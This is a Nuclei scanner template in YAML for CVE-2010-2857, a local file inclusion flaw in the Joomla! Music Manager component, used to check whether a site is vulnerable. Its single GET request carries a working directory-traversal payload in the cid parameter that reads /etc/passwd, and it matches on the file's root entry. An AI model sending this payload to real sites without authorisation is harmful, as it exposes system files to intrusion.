44 lines
1.5 KiB
YAML
44 lines
1.5 KiB
YAML
id: CVE-2010-2857
|
|
|
|
info:
|
|
name: Joomla! Component Music Manager - Local File Inclusion
|
|
author: daffainfo
|
|
severity: medium
|
|
description: A directory traversal vulnerability in the Music Manager component for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the cid parameter to album.html.
|
|
remediation: Upgrade to the latest version to mitigate this vulnerability.
|
|
reference:
|
|
- https://www.exploit-db.com/exploits/14274
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2010-2857
|
|
- http://www.exploit-db.com/exploits/14274
|
|
- https://exchange.xforce.ibmcloud.com/vulnerabilities/60195
|
|
classification:
|
|
cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P
|
|
cvss-score: 6.8
|
|
cve-id: CVE-2010-2857
|
|
cwe-id: CWE-22
|
|
epss-score: 0.00826
|
|
epss-percentile: 0.80076
|
|
cpe: cpe:2.3:a:danieljamesscott:com_music:0.1:-:*:*:*:*:*:*
|
|
metadata:
|
|
max-request: 1
|
|
vendor: danieljamesscott
|
|
product: com_music
|
|
tags: cve2010,joomla,lfi,edb,cve
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/component/music/album.html?cid=../../../../../../../../../../../../etc/passwd%00"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: regex
|
|
regex:
|
|
- "root:.*:0:0:"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
# digest: 490a0046304402203d258d239c9248b152f83ca3698b1670e40544ee08c8e9966db8b11415806d85022052c897042896318c98cd2f3d26a882efddd9ab0afe0811c65efc87a0a7b55015:922c64590222798bb761d5b6d8e72950
|